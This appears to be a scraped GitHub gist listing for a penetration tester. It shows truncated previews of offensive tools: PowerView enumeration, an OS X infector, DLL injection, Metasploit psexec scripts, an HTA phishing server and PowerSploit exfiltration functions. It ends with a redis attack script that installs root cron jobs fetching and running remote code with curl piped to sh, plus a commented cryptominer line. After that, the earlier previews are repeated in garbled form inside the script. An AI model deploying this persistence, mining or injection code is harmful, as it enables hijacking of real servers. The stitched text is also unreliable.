Chris Gates carnal0wnage

## PowerView-2.0-tricks.ps1
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse

# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local

# retrieve all the computers a GPP password applies to

## osx_infector.py
import os
import struct
import shutil
import subprocess


class macho_intel32_shellcode():
    """
    Mach-O Intel x32 shellcode class
    """

## 00readme.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                carnal0wnage
                / 00readme.md
            
            
              Created
              June 4, 2016 03:34
                — forked from indrora/00readme.md
            
              
                DeadUpdate: Kickin' it bigtime. 
              
          
                                 From the vendor that brought you a
                        vulnerable cloud storage platform comes
                        
           ___              ____  __        __     __ 
          / _ \___ ___ ____/ / / / /__  ___/ /__ _/ /____ 
         / // / -_) _ `/ _  / /_/ / _ \/ _  / _ `/ __/ -_)
        /____/\__/\_,_/\_,_/\____/ .__/\_,_/\_,_/\__/\__/ 
         Because popping SYSTEM /_/ is easy when you trust HTTP

Or, "How I learned to stop worrying and

  
## rapid_fire_psexec_portnum.rb
<ruby>
hosts = []
begin
    framework.db.services.each do |service|
      if ( service.port ==445 and service.state == 'open' and service.proto == 'tcp')
          hosts << {'ip' => service.host.address}
      end
    end
end

## gist:457a3248ea36cfffc6c9
<#
  Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
  To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>

function Receive-Request {
   param(
      $Request
   )
   $output = ""

## gist:73ccc44c5b8fc5c53fcb
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Command -Module Exfiltration

CommandType     Name                                               ModuleName
-----------     ----                                               ----------
Function        Get-GPPPassword                                    Exfiltration
Function        Get-Keystrokes                                     Exfiltration
Function        Get-TimedScreenshot                                Exfiltration
Function        Get-VaultCredential                                Exfiltration
Function        Get-VolumeShadowCopy                               Exfiltration
Function        Invoke-CredentialInjection                         Exfiltration

## dll_injection.py
import sys
from ctypes import *

PAGE_READWRITE     =     0x04
PROCESS_ALL_ACCESS =     ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM        =     ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32 #Get the wanted dll

pid = sys.argv[1] #Gather sent parameters

## export_workspaces.rb
<ruby>
File.open("/root/workspaces.txt", "r") do |f|
    f.each_line do |line|
      run_single("workspace #{line}")
      run_single("db_export -f xml -a /root/msf_workspace_export/#{line}_export_13Aug2016.xml")
      run_single("db_export -f pwdump -a /root/msf_workspace_export/#{line}_export_13Aug2016.pwdump")
    end
  end
</ruby>

## http_version_vhost.rb
<ruby>

#variables
maxjobs = 5			#throttling if we get too much jobs

#default to 15 Threads
if (framework.datastore['THREADS'] == nil)
	run_single("setg THREADS 5")
end

## redis-noauth-lady-hack.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/crontabs/root

# ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &


if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server
	Get-NetLocalGroup -Recurse SERVER.domain.local

	# retrieve all the computers a GPP password applies to
	import os
	import struct
	import shutil
	import subprocess


	class macho_intel32_shellcode():
	"""
	Mach-O Intel x32 shellcode class
	"""
	<ruby>
	hosts = []
	begin
	framework.db.services.each do \|service\|
	if ( service.port ==445 and service.state == 'open' and service.proto == 'tcp')
	hosts << {'ip' => service.host.address}
	end
	end
	end
	<#
	Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
	To change your server, simply find and replace 192.168.1.1 with your server in the code.
	#>

	function Receive-Request {
	param(
	$Request
	)
	$output = ""
	PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Command -Module Exfiltration

	CommandType Name ModuleName
	----------- ---- ----------
	Function Get-GPPPassword Exfiltration
	Function Get-Keystrokes Exfiltration
	Function Get-TimedScreenshot Exfiltration
	Function Get-VaultCredential Exfiltration
	Function Get-VolumeShadowCopy Exfiltration
	Function Invoke-CredentialInjection Exfiltration
	import sys
	from ctypes import *

	PAGE_READWRITE = 0x04
	PROCESS_ALL_ACCESS = ( 0x000F0000 \| 0x00100000 \| 0xFFF )
	VIRTUAL_MEM = ( 0x1000 \| 0x2000 )

	kernel32 = windll.kernel32 #Get the wanted dll

	pid = sys.argv[1] #Gather sent parameters
	<ruby>
	File.open("/root/workspaces.txt", "r") do \|f\|
	f.each_line do \|line\|
	run_single("workspace #{line}")
	run_single("db_export -f xml -a /root/msf_workspace_export/#{line}_export_13Aug2016.xml")
	run_single("db_export -f pwdump -a /root/msf_workspace_export/#{line}_export_13Aug2016.pwdump")
	end
	end
	</ruby>
	<ruby>

	#variables
	maxjobs = 5 #throttling if we get too much jobs

	#default to 15 Threads
	if (framework.datastore['THREADS'] == nil)
	run_single("setg THREADS 5")
	end
	export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

	echo "/15 * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 \| sh" > /var/spool/cron/root
	mkdir -p /var/spool/cron/crontabs
	echo "/15 * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 \| sh" > /var/spool/cron/crontabs/root

	# ps auxf \| grep -v grep \| grep yam \|\| nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &


	if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then